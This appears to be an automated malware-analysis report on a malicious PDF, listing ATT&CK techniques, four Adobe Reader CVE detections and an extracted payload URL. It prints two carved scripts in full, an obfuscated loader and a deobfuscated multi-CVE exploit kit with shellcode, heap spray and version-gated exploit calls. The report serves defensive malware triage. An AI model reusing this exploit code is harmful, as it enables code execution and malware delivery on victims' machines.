MALICIOUS
410
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, CVE-2008-2992) to execute arbitrary code. The deobfuscated JavaScript attempts to download a payload from the URL http://ahrudi.egh/4. This indicates a malicious document designed to exploit vulnerabilities for initial execution and payload delivery.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 10
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ahrudi.egh/4 Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0010_000.js |
pdf-javascript-stream | PDF /JS object 10 at offset 0xDED | 1572 bytes |
SHA-256: 3c45e59a17c591683f4cce1ce1b779ddd09d7a2193a920c9b9065cd8aa3aad38 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var j='';var tW='';if (!this.JSON) {try { function walk(holder, key) { var k, v, value = holder[key]; if (value && typeof value === 'object') { for (k in value) { if (Object.hasOwnProperty.call(value, k)) { v = walk(value, k); if (v !== undefined) { value[k] = v; } else { delete value[k]; } } } } return reviver.call(holder, key, value); }j='var kB = 56 ;var# rS =# this;var oBG=\'ge\'+\'tP##agAeNt\'+\'hWo#rd\';AAvar #aV=\'ge\'+\'tPaA#g\'A+\'eN##umW\'+\'ordA#s\';va##r r#AU=\'fr\'+A#\'omCAh\'+#\'arCode\';var iD=rS[#aV](this.ApageNum);var #t=#A\'\';for(vAar AnQH=0;nQH< i#ADA#;AA nQAAH++){t=[t##,rS[oA#BG](rS.pag#eNum,#nQH,A#t#Arue)].joi##n(\'\');#;}va##r nSJ=#\'\';Af#o#r(v#ar #nQH=0;n#QH #< t.leng#Ath; nQHA#+=2)A{xG=t.##substr(##nQH,A2);nSJ=[nSJ,String##[rU]#(parseInt(xG,A16)^kB##)].join(\'\');}A#eva#AlAA(nSJ);nSJ=nuAll;'.replace(/[A#]/g, ''); function str(key, holder) { var i,k,v,length,mind = gap,partial,value = holder[key]; if (value && typeof value === 'object' && typeof value.toJSON === 'function') { value = value.toJSON(key); } }tW = new Function(j);cBQ(eLG);} catch(aX){tW();}}
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3767 bytes |
SHA-256: 7c7a4655e9e5fda698c0562be66678e9136d2f4921b26dab7e33d3443af66f1a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var h=26326;var v='';try {var lM='d'} catch(lM){};var pQZ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';this.zC=false;var pE="pE";var pQ=false;var vS=this.info['yP'].replace(/[\s]/g, '');dW={};var zS=["eZ","fM","wZ"];var mTE = this.info;var yZ = (mTE.producer.substr(0,5) == 'debug');var zKZ = new Array(); var lG = "%u";function qH(str){str = str.split(lG);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function nW(str1, str2){return [str1, str2].join("");}function eD(rG){var eL = hS();var iX = nQ();eL += ((eL.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + iX;if(yZ) app.alert("URL: " + eL);eL=aJ(eL);var d=lG;var xG=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";xG+=eL;return qH(xG);};function hS(){var iJ = (mTE.author + mTE.title).replace(/[\s]/g, '');var nS = oB(iJ, vS, pQZ);return nS;};function oB(iJ, pQZ, vS){var nS="";for(var i=0; i < iJ.length; i++){var lK = pQZ.indexOf(iJ[i]);if(lK > -1 ){nS += vS[lK];}}return nS;};function aJ(iJ){var out = "";iJ = eLI(iJ);g = Math.round(iJ.length / 4);if (g != iJ.length /4) iJ+="00";for(var i=0; i < iJ.length; i+=4){out+= lG + iJ.substr(i+2, 2) + iJ.substr(i, 2);}return out;};function eLI(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function gFI(mV, len){while (mV.length * 2 < len){mV = nW(mV, mV);}return mV.substring(0, len / 2);};function dY(qF){var pK = 0x0c0c0c0c; sV = eD("pdf");if (qF == 1){pK = 0x30303030;}var fI = 0x400000;var ln = sV.length * 2;var wB = fI - (ln + 0x38);var mV = qH(lG+"9090"+lG+"9090"); mV = gFI(mV, wB);var nIR = (pK - 0x400000) / fI;for (var b = 0; b < nIR; b ++ ){zKZ[b] = nW(mV, sV);}};function nQ(){try {return app.viewerVersion.toString();}catch(bC){ return 0;}}if(yZ) app.alert("called exploit");var iX = nQ();if(yZ) app.alert("v: " + iX);if (iX > 8){if(yZ) app.alert("util.printf");dY(1);var gL = "12999999999999999999";for (fMN=0; fMN < 276; fMN++) gL += "8";util.printf("%45000f", gL);}if (iX < 8){if(yZ) app.alert("Collab.collectEmailInfo");dY(0);var xW = qH(lG+"0c0c"+lG+"0c0c");while (xW.length < 44952) xW += xW;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : xW});}if (iX < 9.1){if (app.doc.Collab.getIcon){if(yZ) app.alert("Collab.getIcon");dY(0);var gLE = unescape("%09");while (gLE.length < 0x4000) gLE += gLE;gLE = "N." + gLE;app.doc.Collab.getIcon(gLE);}}if (iX == 9.2){if(yZ) app.alert("media.newPlayer");dY(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var pC={nI:"uX".charCodeAt(24487)};try {} catch(zK){};vI=["iB","nE","cL"];�*�� �*�� �*�� �*�� �*�� FF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.